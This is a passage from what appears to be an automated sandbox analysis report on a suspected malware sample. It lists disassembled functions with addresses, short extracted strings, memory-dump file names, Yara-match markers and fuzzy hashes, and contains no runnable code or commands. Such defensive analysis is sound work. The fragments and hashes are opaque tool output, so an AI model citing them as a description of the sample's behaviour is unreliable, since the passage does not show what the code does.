Opcode Fuzzy Hash: acae2c6d6ad8391dc1129981725b17c360ee2c6a5bf9b35d1d5a0709c01f70e0
Instruction Fuzzy Hash: 1B811E72D0020DEBCF18CFE5D98A9EEBBB2FB44318F208159E411BA260D7B55A59CF54

Uniqueness

Uniqueness Score: -1.00%

Function 00BD20F8, Relevance: 2.6, Strings: 2, Instructions: 144COMMON

Download Yara Rule

Strings

`B, xrefs: 00BD222C
Ep?, xrefs: 00BD21CB

Memory Dump Source

Source File: 00000000.00000002.695194843.0000000000BB0000.00000040.00000010.sdmp, Offset: 00BB0000, based on PE: true

Yara matches

Similarity

API ID:
String ID: Ep?$`B
API String ID: 0-215957162
Opcode ID: b67c8f3121f9782fa7cf2434d4f27306b223b2f3be534379c623008ef153d930
Instruction ID: de67dcd8c26a64607c7c18155ac5ad21e1acd39cc29bdbe15b6b52d93f4402fd
Opcode Fuzzy Hash: b67c8f3121f9782fa7cf2434d4f27306b223b2f3be534379c623008ef153d930
Instruction Fuzzy Hash: 925138729083819FC354DF25D58A41BFBF0FBD8718F504A6EF8E566260D7748A098B87

Uniqueness

Uniqueness Score: -1.00%

Function 00BB2176, Relevance: 2.6, Strings: 2, Instructions: 130COMMON

Download Yara Rule

Strings

4T @, xrefs: 00BB2201
;E, xrefs: 00BB22BF

Memory Dump Source

Source File: 00000000.00000002.695194843.0000000000BB0000.00000040.00000010.sdmp, Offset: 00BB0000, based on PE: true

Yara matches

Similarity

API ID:
String ID: 4T @$;E
API String ID: 0-2491102183
Opcode ID: f60da96eca841a6946f5692e07f48cca91ffee08b3b1f636498513dd9e5dea0f
Instruction ID: 04af406c47435c5217788e97654497e28a9dbf89728b04f161f8818868ddc02b
Opcode Fuzzy Hash: f60da96eca841a6946f5692e07f48cca91ffee08b3b1f636498513dd9e5dea0f
Instruction Fuzzy Hash: F1518AB15093419FD308CF25D58981BBBE1FBC4758F508A1EF0896A260D7B1CA48CF97

Uniqueness

Uniqueness Score: -1.00%

Function 00BB5DC3, Relevance: 2.6, Strings: 2, Instructions: 127COMMON

Download Yara Rule

Strings

=7u/, xrefs: 00BB5E7D
=7u/, xrefs: 00BB5FC6

Memory Dump Source

Source File: 00000000.00000002.695194843.0000000000BB0000.00000040.00000010.sdmp, Offset: 00BB0000, based on PE: true

Yara matches

Similarity

API ID:
String ID: =7u/$=7u/
API String ID: 0-275303271
Opcode ID: 81e3abc9cd39685aae4be6a606915435aef8c3564b58978b7cc9954902f6d2e5
Instruction ID: 54844139435eedef050b10236b2730e7094e2a5331d348b5aa9f088444bc8bce
Opcode Fuzzy Hash: 81e3abc9cd39685aae4be6a606915435aef8c3564b58978b7cc9954902f6d2e5
Instruction Fuzzy Hash: 4C5186715083019FD368DF20848596FFBE1FBD8398F504A5DF69AA6220D3B58A49CF83

Uniqueness

Uniqueness Score: -1.00%

Function 00BB2DC5, Relevance: 2.6, Strings: 2, Instructions: 123COMMON

Download Yara Rule

Strings

`F, xrefs: 00BB2ECD
50, xrefs: 00BB2E29

Memory Dump Source

Source File: 00000000.00000002.695194843.0000000000BB0000.00000040.00000010.sdmp, Offset: 00BB0000, based on PE: true

Yara matches

Similarity

API ID:
String ID: 50$`F
API String ID: 0-2597214580
Opcode ID: 0364f6d1653c4bde0a341bef7ef3f32b1fe62a687ceb0c490c78cd4738c8066f
Instruction ID: d9a08ec6546393eae2f62ea5b36815a47aee90d220fc6a859294680247821a40
Opcode Fuzzy Hash: 0364f6d1653c4bde0a341bef7ef3f32b1fe62a687ceb0c490c78cd4738c8066f
Instruction Fuzzy Hash: 705167715083429FC745CF21D88582FBBE1FBD8348F504A6DF59656260E7B5CA0A8F87

Uniqueness

Uniqueness Score: -1.00%

Function 00BBAEB9, Relevance: 2.6, Strings: 2, Instructions: 100COMMON

Download Yara Rule

Strings

!\, xrefs: 00BBAFD4
yXw, xrefs: 00BBAF39

Memory Dump Source

Source File: 00000000.00000002.695194843.0000000000BB0000.00000040.00000010.sdmp, Offset: 00BB0000, based on PE: true

Yara matches

Similarity

API ID:
String ID: yXw$!\
API String ID: 0-755724215
Opcode ID: 3396abaa3d2a71d17032ecb5bf50b9f498ab2f390e4ba55013dbe3193c69048f
Instruction ID: 390ce2b30d1b52e62377f262029f0a6f13ac43b4f98c70e12a69333bbbbb1e6a
Opcode Fuzzy Hash: 3396abaa3d2a71d17032ecb5bf50b9f498ab2f390e4ba55013dbe3193c69048f
Instruction Fuzzy Hash: E3410F72D0020DEBCF14DFA5C94A9EEBBB5EF84318F208199D411B6260D7B91A55CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 00BCBFA1, Relevance: 2.6, Strings: 2, Instructions: 89COMMON

Download Yara Rule

Strings

1VC, xrefs: 00BCC07A
HRG, xrefs: 00BCC055

Memory Dump Source

Source File: 00000000.00000002.695194843.0000000000BB0000.00000040.00000010.sdmp, Offset: 00BB0000, based on PE: true

Yara matches

Similarity

API ID:
String ID: 1VC$HRG
API String ID: 0-1729148703
Opcode ID: d91384db02164864f113f243955d1fa5785661b934d34a94043782ee8d1840ae
Instruction ID: 0fad4e07c9f4ef1e5fc4726d81c6537a2fe41e27d22b87dfef16258835136c31
Opcode Fuzzy Hash: d91384db02164864f113f243955d1fa5785661b934d34a94043782ee8d1840ae
Instruction Fuzzy Hash: 8C317972908301CBC318DE25D84991FBBE1EBD4728F008A9EF898A7251D3B59D09CF96

Uniqueness

Uniqueness Score: -1.00%

Function 00BC0824, Relevance: 2.6, Strings: 2, Instructions: 77COMMON

Download Yara Rule

Strings

:O, xrefs: 00BC0910
g;{, xrefs: 00BC0867

Memory Dump Source

Source File: 00000000.00000002.695194843.0000000000BB0000.00000040.00000010.sdmp, Offset: 00BB0000, based on PE: true

Yara matches

Similarity

API ID:
String ID: :O$g;{
API String ID: 0-3257243416
Opcode ID: 1f7edd328e28f6af2a72c4d4d6a5b36b3881e85017b5a27d0145efcadb109785
Instruction ID: ed8f6b07904279dcdcccd523e668c3caba6002b111237b66314101d46c67a4e0
Opcode Fuzzy Hash: 1f7edd328e28f6af2a72c4d4d6a5b36b3881e85017b5a27d0145efcadb109785
Instruction Fuzzy Hash: 4341F1B580034AEBCF05CFA5DA0A8DEBBB5FF54318F108548E925A6220D3B59B65DF90

Uniqueness

Uniqueness Score: -1.00%

Function 6ED30A61, Relevance: 1.8, APIs: 1, Instructions: 274COMMON

Download Yara Rule

APIs

RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,?,?,?,6ED30A5C,?,?,?,?,?,?,00000000), ref: 6ED30C8E

Memory Dump Source

Source File: 00000000.00000002.695699274.000000006ED11000.00000020.00020000.sdmp, Offset: 6ED10000, based on PE: true

Associated: 00000000.00000002.695686015.000000006ED10000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.695729571.000000006ED3A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.695782032.000000006ED6D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.695800005.000000006ED6F000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.695816014.000000006ED70000.00000002.00020000.sdmp Download File

Similarity

API ID: ExceptionRaise
String ID:
API String ID: 3997070919-0
Opcode ID: 5fa7f750afcd31af6bc1c4d22b6c7daba96e959e4ce097ddd712cac3d0db38f1
Instruction ID: 4b67e484786aaf1dda8fbf1d606b89b35eea813dcd866c5990d92b88e3661206
Opcode Fuzzy Hash: 5fa7f750afcd31af6bc1c4d22b6c7daba96e959e4ce097ddd712cac3d0db38f1
Instruction Fuzzy Hash: 3BB18E31610619CFD744CF68C4A6B957BE0FF463A9F258658E8E9CF2A1D335E982CB40

Uniqueness

Uniqueness Score: -1.00%

Function 6ED2CC44, Relevance: 1.6, APIs: 1, Instructions: 144COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 6ED2CC5A

Memory Dump Source

Source File: 00000000.00000002.695699274.000000006ED11000.00000020.00020000.sdmp, Offset: 6ED10000, based on PE: true

Associated: 00000000.00000002.695686015.000000006ED10000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.695729571.000000006ED3A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.695782032.000000006ED6D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.695800005.000000006ED6F000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.695816014.000000006ED70000.00000002.00020000.sdmp Download File

Similarity

API ID: FeaturePresentProcessor
String ID:
API String ID: 2325560087-0
Opcode ID: 6fe8d696d797bce7ae15be00966fc0b5ab450ca6b1200cf0f7b0a98b61eaef2c
Instruction ID: 14f6d3e83c9571e68c432e7a1686d86fe4202770fcf592b352ac04fcdd7501dc
Opcode Fuzzy Hash: 6fe8d696d797bce7ae15be00966fc0b5ab450ca6b1200cf0f7b0a98b61eaef2c
Instruction Fuzzy Hash: 475157B1A10605CFEB44CFA9C8857AABBF4FB89354F20802AC915EB241D375E901CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 6ED32FE7, Relevance: 1.6, APIs: 1, Instructions: 140COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.695699274.000000006ED11000.00000020.00020000.sdmp, Offset: 6ED10000, based on PE: true

Associated: 00000000.00000002.695686015.000000006ED10000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.695729571.000000006ED3A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.695782032.000000006ED6D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.695800005.000000006ED6F000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.695816014.000000006ED70000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 369485f7277a03eeb625e045a5b79424d2eb484acf115fb3db033eeadfef1d40
Instruction ID: 0f9c7fe34c75be3d7e2dafc9f8740a367720202c3616ee95b9414271b0e549de
Opcode Fuzzy Hash: 369485f7277a03eeb625e045a5b79424d2eb484acf115fb3db033eeadfef1d40
Instruction Fuzzy Hash: 2341A675C04229AFDB50DFA9CD88AEABBBCAF46304F2445D9E418D3200DB359E858F60

Uniqueness

Uniqueness Score: -1.00%

Function 6ED20F10, Relevance: 1.6, Strings: 1, Instructions: 365COMMON

Download Yara Rule

Strings

UNC\, xrefs: 6ED21143

Memory Dump Source

Source File: 00000000.00000002.695699274.000000006ED11000.00000020.00020000.sdmp, Offset: 6ED10000, based on PE: true

Associated: 00000000.00000002.695686015.000000006ED10000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.695729571.000000006ED3A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.695782032.000000006ED6D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.695800005.000000006ED6F000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.695816014.000000006ED70000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID: UNC\
API String ID: 0-505053535
Opcode ID: e05c319bcd12d5d8acacf2294e04bd082e9d0820d63d75f08959ffbf33f1e664
Instruction ID: 5a6c5e7aef70c0ceee62d5e8e8723501473c383e05fb8c0bb678cec54af5e2de
Opcode Fuzzy Hash: e05c319bcd12d5d8acacf2294e04bd082e9d0820d63d75f08959ffbf33f1e664
Instruction Fuzzy Hash: 51D1D431608616CFC311CFA9C58065AB7E3AF8531CF64C779E6A88B295D632DD4E8B81

Uniqueness

Uniqueness Score: -1.00%

Function 00BB39C3, Relevance: 1.5, Strings: 1, Instructions: 231COMMON

Download Yara Rule

Strings

^5}, xrefs: 00BB3A59

Memory Dump Source

Source File: 00000000.00000002.695194843.0000000000BB0000.00000040.00000010.sdmp, Offset: 00BB0000, based on PE: true

Yara matches

Similarity

API ID:
String ID: ^5}
API String ID: 0-367400351
Opcode ID: cf4ea07d6cd81bb0a8f9cada6e0b1e0a34712246b2e4d8e0ee734d74c5a2f2db
Instruction ID: 0145e17782e57a387cc96c6552152e2861164db4397fed128fefa106b8fc4571
Opcode Fuzzy Hash: cf4ea07d6cd81bb0a8f9cada6e0b1e0a34712246b2e4d8e0ee734d74c5a2f2db
Instruction Fuzzy Hash: 3EA17C715083409BC768DF24C4995BFBBE1FFD4B18F500AADF58A96220D7B59A48CB83

Uniqueness

Uniqueness Score: -1.00%

Function 00BB8D59, Relevance: 1.4, Strings: 1, Instructions: 191COMMON

Download Yara Rule

Strings

Rz, xrefs: 00BB8E1F

Memory Dump Source

Source File: 00000000.00000002.695194843.0000000000BB0000.00000040.00000010.sdmp, Offset: 00BB0000, based on PE: true

Yara matches

Similarity

API ID:
String ID: Rz
API String ID: 0-2038740235
Opcode ID: fb2c5e8ec93d0e18410cdb73d6d80f4977eb398be7601bf3137f27d64a2ece7a
Instruction ID: 3aa64d29dbfee9d0d3584882e34430b6bd73bb8dfe0c73d6ac1cd3e0d8dbd3f8
Opcode Fuzzy Hash: fb2c5e8ec93d0e18410cdb73d6d80f4977eb398be7601bf3137f27d64a2ece7a
Instruction Fuzzy Hash: BE912EB14093819FC758DF26C58946FFBE1FBD5708F104A1EF29696260D7B18A09CF86

Uniqueness

Uniqueness Score: -1.00%

Function 00BB33A9, Relevance: 1.4, Strings: 1, Instructions: 170COMMON

Download Yara Rule

Strings

&-, xrefs: 00BB3483

Memory Dump Source

Source File: 00000000.00000002.695194843.0000000000BB0000.00000040.00000010.sdmp, Offset: 00BB0000, based on PE: true

Yara matches

Similarity

API ID:
String ID: &-
API String ID: 0-1647332301
Opcode ID: 242f9a9e448ed3109bdadd126a0d16453c1df0c57638905df83b09f771bc243c
Instruction ID: 760d7651c8ffb9eafa45a5e569804da843efe05abd7645fa9ce455c6f19e77ef
Opcode Fuzzy Hash: 242f9a9e448ed3109bdadd126a0d16453c1df0c57638905df83b09f771bc243c
Instruction Fuzzy Hash: 0A7143704083819FC768CF64C48A6AFBFE1FBD5798F504A1DF19256260D3B58A89CB92

Uniqueness

Uniqueness Score: -1.00%

Function 00BB7D87, Relevance: 1.4, Strings: 1, Instructions: 140COMMON

Download Yara Rule

Strings

]1, xrefs: 00BB7DE5

Memory Dump Source

Source File: 00000000.00000002.695194843.0000000000BB0000.00000040.00000010.sdmp, Offset: 00BB0000, based on PE: true

Yara matches

Similarity

API ID:
String ID: ]1
API String ID: 0-3136993215
Opcode ID: d7e4a39e9e5c26ff6825bbd63b05b5f75ece3416f93472cf8e37b08cdd133fa2
Instruction ID: 1972d1a805018bcf98d5c330e0369ec94f492dee843c3bf2f63d924bd38dbdcd
Opcode Fuzzy Hash: d7e4a39e9e5c26ff6825bbd63b05b5f75ece3416f93472cf8e37b08cdd133fa2
Instruction Fuzzy Hash: C251653100D385AFC358CF65C98986BBBE5FBD4758F404A1DF592A2260CBB1CA48CF86

Uniqueness

Uniqueness Score: -1.00%

Function 00BD2560, Relevance: 1.4, Strings: 1, Instructions: 120COMMON

Download Yara Rule

Strings

){, xrefs: 00BD25AA

Memory Dump Source

Source File: 00000000.00000002.695194843.0000000000BB0000.00000040.00000010.sdmp, Offset: 00BB0000, based on PE: true

Yara matches

Similarity

API ID:
String ID: ){
API String ID: 0-1738580931
Opcode ID: 4c27470c79ad73ccb5f55289d0ed3a651ff421185eb5969a21ce754adb2516a2
Instruction ID: f27a95fc989b82d932ddde27865a2bcf48d3977f0107cefe3c2c02378e69731e
Opcode Fuzzy Hash: 4c27470c79ad73ccb5f55289d0ed3a651ff421185eb5969a21ce754adb2516a2
Instruction Fuzzy Hash: 074167316083419FC718DF21998691BFBE1FBD8748F00895EF58696220D771CA0A8F83

Uniqueness

Uniqueness Score: -1.00%

Function 00BB4F42, Relevance: 1.4, Strings: 1, Instructions: 118COMMON

Download Yara Rule

Strings

B;}, xrefs: 00BB4FA4

Memory Dump Source

Source File: 00000000.00000002.695194843.0000000000BB0000.00000040.00000010.sdmp, Offset: 00BB0000, based on PE: true

Yara matches

Similarity

API ID:
String ID: B;}
API String ID: 0-3368358345
Opcode ID: d42b9a3e0dda7c9767df23912b54b429183cbbf70ae7f9e49fceb8eb2154b66f
Instruction ID: e6075c35ac5694db2be1641272880c5bc55390bd7284d446ff8a5dd48e37a28c
Opcode Fuzzy Hash: d42b9a3e0dda7c9767df23912b54b429183cbbf70ae7f9e49fceb8eb2154b66f
Instruction Fuzzy Hash: CD5113711083419FC759CF26C98A82BBFE1FBC8748F544A4DF596A6220D3B18A19CF87

Uniqueness

Uniqueness Score: -1.00%

Function 00BB635F, Relevance: 1.4, Strings: 1, Instructions: 111COMMON

Download Yara Rule

Strings

N, xrefs: 00BB6401

Memory Dump Source

Source File: 00000000.00000002.695194843.0000000000BB0000.00000040.00000010.sdmp, Offset: 00BB0000, based on PE: true

Yara matches

Similarity

API ID:
String ID: N
API String ID: 0-3948818596
Opcode ID: 36e90f4d2d8bce284f2561ecaf7bab2ddf48de27cfd66f72c3a763bc84aa1489
Instruction ID: fa298dae3fb3240bf13b363fc410fca40c9445f419100326a951722440c73364
Opcode Fuzzy Hash: 36e90f4d2d8bce284f2561ecaf7bab2ddf48de27cfd66f72c3a763bc84aa1489
Instruction Fuzzy Hash: 7741A8711083819BC758CE25D59946FBBE1FBD4748F104A2EF59A66260D3B88A09CF83

Uniqueness

Uniqueness Score: -1.00%

Function 00BBF699, Relevance: 1.4, Strings: 1, Instructions: 104COMMON

Download Yara Rule

Strings

C|, xrefs: 00BBF7A4

Memory Dump Source

Source File: 00000000.00000002.695194843.0000000000BB0000.00000040.00000010.sdmp, Offset: 00BB0000, based on PE: true

Yara matches

Similarity

API ID:
String ID: C|
API String ID: 0-2444742693
Opcode ID: ed0f62a632d906fb3c43c3fe32992958e3bbf5cf354087c936e85217c67f69d2
Instruction ID: 21afa1e5a86a5d7f965f1ccec218b50a294b98d53a3bb47e8698c259034be1cc
Opcode Fuzzy Hash: ed0f62a632d906fb3c43c3fe32992958e3bbf5cf354087c936e85217c67f69d2
Instruction Fuzzy Hash: 1541E271E01209EBCF08CFA9C9868DEBFB6EB84314F20C0AAE015AB250D7B55B55DF50

Uniqueness

Uniqueness Score: -1.00%

Function 00BBDD66, Relevance: 1.3, Strings: 1, Instructions: 92COMMON

Download Yara Rule

Strings

CCP, xrefs: 00BBDDC8

Memory Dump Source

Source File: 00000000.00000002.695194843.0000000000BB0000.00000040.00000010.sdmp, Offset: 00BB0000, based on PE: true

Yara matches

Similarity

API ID:
String ID: CCP
API String ID: 0-1034069945
Opcode ID: 3e59c4399d6a2cb82ee090332a18dd5b708fd5e2eadda935f09b0a5565451fd9
Instruction ID: 85d335f24c8bc53d65f24b3c60784e7354e9d4a0a65597124933f5765f2462d3
Opcode Fuzzy Hash: 3e59c4399d6a2cb82ee090332a18dd5b708fd5e2eadda935f09b0a5565451fd9
Instruction Fuzzy Hash: 2941F2B2C0031DABDF55DFE0C94A8EEBBB4FB24304F108198D511B6260E3B85A85DFA5

Uniqueness

Uniqueness Score: -1.00%

Function 00BB54C0, Relevance: 1.3, Strings: 1, Instructions: 84COMMON

Download Yara Rule

Strings

2+]X, xrefs: 00BB54F8

Memory Dump Source

Source File: 00000000.00000002.695194843.0000000000BB0000.00000040.00000010.sdmp, Offset: 00BB0000, based on PE: true

Yara matches

Similarity

API ID:
String ID: 2+]X
API String ID: 0-635157736
Opcode ID: 481d722715983e272cc469dc43216b96c655eaa670e4ddf9da5fb0d9274d257e
Instruction ID: 1ec3aa1e8c3e8e75c000b5ec22ace4db44f48519d03512774f5629c22d24b518
Opcode Fuzzy Hash: 481d722715983e272cc469dc43216b96c655eaa670e4ddf9da5fb0d9274d257e
Instruction Fuzzy Hash: C431AA72A283419BC314CF28848195AFBE0EFA8714F450A6DE885A7241D770E909CB92

Uniqueness

Uniqueness Score: -1.00%

Function 00BC8518, Relevance: 1.3, Strings: 1, Instructions: 82COMMON

Download Yara Rule

Strings

g, xrefs: 00BC853E

Memory Dump Source

Source File: 00000000.00000002.695194843.0000000000BB0000.00000040.00000010.sdmp, Offset: 00BB0000, based on PE: true

Yara matches

Similarity

API ID:
String ID: g
API String ID: 0-1037297435
Opcode ID: 12f60b9f080022c690087f5a0feae30e1c4340ffe80795349f84256cb1c1a91f
Instruction ID: 5c5add5a072afba7c5f04c1d03198fa6fa66057181ce68bacec8f02d28e3f6e6
Opcode Fuzzy Hash: 12f60b9f080022c690087f5a0feae30e1c4340ffe80795349f84256cb1c1a91f
Instruction Fuzzy Hash: 4421AD726083048FC754DF2AD881A1BB7E6EFD8718F448A6EF899D3254DBB0D905CB42

Uniqueness

Uniqueness Score: -1.00%

Function 00BD314A, Relevance: 1.3, Strings: 1, Instructions: 63COMMON

Download Yara Rule

Strings

BGd, xrefs: 00BD31BE

Memory Dump Source

Source File: 00000000.00000002.695194843.0000000000BB0000.00000040.00000010.sdmp, Offset: 00BB0000, based on PE: true

Yara matches

Similarity

API ID:
String ID: BGd
API String ID: 0-2042166335
Opcode ID: a72e445dec8ea7b5338fe7369db8ed5e1fb3125761641ecec233543bdc38b076
Instruction ID: 2e58e56d1ada5d8a219d51758bcecd657db4e4a273e782a8ae810be325030d6a
Opcode Fuzzy Hash: a72e445dec8ea7b5338fe7369db8ed5e1fb3125761641ecec233543bdc38b076
Instruction Fuzzy Hash: 6C2120B6D0020EEBCF14CFA5DA4A8EEFBB5EB44304F248199D921B6260D3B44B05CF90

Uniqueness

Uniqueness Score: -1.00%

Function 00BBF20D, Relevance: 1.3, Strings: 1, Instructions: 61COMMON

Download Yara Rule

Strings

PGX, xrefs: 00BBF2D8

Memory Dump Source

Source File: 00000000.00000002.695194843.0000000000BB0000.00000040.00000010.sdmp, Offset: 00BB0000, based on PE: true

Yara matches

Similarity

API ID:
String ID: PGX
API String ID: 0-1232467878
Opcode ID: 6d344073126c322d667a6cc01d9c370364212fb50b1291a5e132b7dfadb72e2e
Instruction ID: 19099de8834581ddb20f0c681f823c710b83c4138bd9eea919ebc9b0c84fa77f
Opcode Fuzzy Hash: 6d344073126c322d667a6cc01d9c370364212fb50b1291a5e132b7dfadb72e2e
Instruction Fuzzy Hash: 9831CD71D0120EEBCB08DFA1D94A4EEFBB1BB44308F208199D522B6260D7B45B59DF91

Uniqueness

Uniqueness Score: -1.00%

Function 6ED138C0, Relevance: .5, Instructions: 489COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.695699274.000000006ED11000.00000020.00020000.sdmp, Offset: 6ED10000, based on PE: true

Associated: 00000000.00000002.695686015.000000006ED10000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.695729571.000000006ED3A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.695782032.000000006ED6D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.695800005.000000006ED6F000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.695816014.000000006ED70000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2a2e34bdd8589024cc29990677e7bd8aad702ff8470a3ab64b053727a69d38a9
Instruction ID: 700086d4bacbb15bc0a0271f8fc764793911432f200ca1db79a41610c6982700
Opcode Fuzzy Hash: 2a2e34bdd8589024cc29990677e7bd8aad702ff8470a3ab64b053727a69d38a9
Instruction Fuzzy Hash: A702FE71B1C7158FD315DFA9D48426AB7E2AFDA300F52C72EE885A3350E770E8868781

Uniqueness

Uniqueness Score: -1.00%

Function 00BB6125, Relevance: .1, Instructions: 144COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.695194843.0000000000BB0000.00000040.00000010.sdmp, Offset: 00BB0000, based on PE: true

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 05922d16403c69e60fcfcd67cef3bf1dc55ff0baeb2b1b572cd30bae7fdc5bce
Instruction ID: 327d1de746ef14106349af051b4b977990414cdb0f39291e66b3692e8c14f11d
Opcode Fuzzy Hash: 05922d16403c69e60fcfcd67cef3bf1dc55ff0baeb2b1b572cd30bae7fdc5bce
Instruction Fuzzy Hash: 066131B1D01209EBDF08CFA5D98A9EEFBB2FB48314F208099E511B6260D7B51A55CF54

Uniqueness

Uniqueness Score: -1.00%

Function 00BB5166, Relevance: .1, Instructions: 113COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.695194843.0000000000BB0000.00000040.00000010.sdmp, Offset: 00BB0000, based on PE: true

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 18a6c2aaa348c2be2b407a1ec8f55cd114c526bedbf1cf25dbfcde981697196a
Instruction ID: d9b6f6ee3e04437f5e622f029b2320686f22a440a1aef3c753ef63f1bd3ae658
Opcode Fuzzy Hash: 18a6c2aaa348c2be2b407a1ec8f55cd114c526bedbf1cf25dbfcde981697196a
Instruction Fuzzy Hash: 4A41AEB16093418BC768CF24D99597FBBE5FBC4748F14092EF18696260D7B1C948CB93

Uniqueness

Uniqueness Score: -1.00%

Function 00BCE478, Relevance: .1, Instructions: 99COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.695194843.0000000000BB0000.00000040.00000010.sdmp, Offset: 00BB0000, based on PE: true

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 62ab12a5c1461a32f5a8ea1cbf4c6ec33fc28f1ed6bb483b06b937df58032f48
Instruction ID: 2e3f69d18af04ed106656edfc744421bb24997d63940bad9bf79c5cb98823dfb
Opcode Fuzzy Hash: 62ab12a5c1461a32f5a8ea1cbf4c6ec33fc28f1ed6bb483b06b937df58032f48
Instruction Fuzzy Hash: FE4103B1C0021DABCF45DFE4C88A8EEBBB5FF48348F508588E521B6210D3B54A45DFA5

Uniqueness

Uniqueness Score: -1.00%

Function 00BD0AD3, Relevance: .1, Instructions: 90COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.695194843.0000000000BB0000.00000040.00000010.sdmp, Offset: 00BB0000, based on PE: true

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 49e848d9c6b67677fafb526c596923f40c93afa7d7e2a42ad7033b1c7560134e
Instruction ID: 4b5897ad94280abd3480da7a6b9b5e05da22b5d692864ded6ac21ecee95e4f28
Opcode Fuzzy Hash: 49e848d9c6b67677fafb526c596923f40c93afa7d7e2a42ad7033b1c7560134e
Instruction Fuzzy Hash: AD319E72A183119FC350DF29C48165AF7E0EF98314F815A2EF99A97350E7B4E909CF92

Uniqueness

Uniqueness Score: -1.00%

Function 00BBF4A5, Relevance: .1, Instructions: 85COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.695194843.0000000000BB0000.00000040.00000010.sdmp, Offset: 00BB0000, based on PE: true

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: de93a77fd16390837d1d2d3c3a02100243de28d0dc2f1f978410ab1109ddaff5
Instruction ID: 55b5112a180d39e8deb96c527d4d43f3fb03d7ee935966680a0a3dfeb9e20837
Opcode Fuzzy Hash: de93a77fd16390837d1d2d3c3a02100243de28d0dc2f1f978410ab1109ddaff5
Instruction Fuzzy Hash: 1E312171D0031AAFDB08CFA1D94AAEEBBB1FB40704F2080A9D511BB250D7B95A55CF90

Uniqueness

Uniqueness Score: -1.00%

Function 00BBF984, Relevance: .1, Instructions: 85COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.695194843.0000000000BB0000.00000040.00000010.sdmp, Offset: 00BB0000, based on PE: true

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f1ff426e79746ad319983153294732274ee39d0f6843496e681fd78a0ea1dbe7
Instruction ID: 5d81f2f144c050fd2d368abb7ed1205c9edb6da30188fc94f61b836dc75e96b4
Opcode Fuzzy Hash: f1ff426e79746ad319983153294732274ee39d0f6843496e681fd78a0ea1dbe7
Instruction Fuzzy Hash: 383118B290020CEFEB05DFA9D889CEEBBB9EB48318F018159F918A6250D3759E119F50

Uniqueness

Uniqueness Score: -1.00%

Function 00BB938F, Relevance: .1, Instructions: 78COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.695194843.0000000000BB0000.00000040.00000010.sdmp, Offset: 00BB0000, based on PE: true

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 41fb78f267175e101537b1da63eb1f95f6ffa96ed1ea6f3c6d98e9dded9ba910
Instruction ID: 21b7b118389b80a8b810ac72a431c183ac339ecbe4d8514b99cab00ace20d3f6
Opcode Fuzzy Hash: 41fb78f267175e101537b1da63eb1f95f6ffa96ed1ea6f3c6d98e9dded9ba910
Instruction Fuzzy Hash: 2331D332900209FBDF059EA5CC06CDEBFB6FF49310F508589FA2566160D3B29A61DB54

Uniqueness

Uniqueness Score: -1.00%

Function 00BD2C16, Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.695194843.0000000000BB0000.00000040.00000010.sdmp, Offset: 00BB0000, based on PE: true

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8ee398f73e3bd3737d3a0f46f012eb34d36fe675d243cd443379ab18b292edab
Instruction ID: be7c3eeb677fcb01dd6789dcd6b3b52099bad6cfec8aefe2fe103fec50557315
Opcode Fuzzy Hash: 8ee398f73e3bd3737d3a0f46f012eb34d36fe675d243cd443379ab18b292edab
Instruction Fuzzy Hash: D23111B1D0030EABCB08CFA5DA4A8EEBBB0EB44304F208199D511B6260D3B51B45CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 00BBE259, Relevance: .1, Instructions: 70COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.695194843.0000000000BB0000.00000040.00000010.sdmp, Offset: 00BB0000, based on PE: true

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5f306290c89833e0bc14cfd63dcada7925a641137887b04603cec1842d07f268
Instruction ID: 8996c371612f60153b78b10724a100a441f438b83eb3dea6754b967f021338d6
Opcode Fuzzy Hash: 5f306290c89833e0bc14cfd63dcada7925a641137887b04603cec1842d07f268
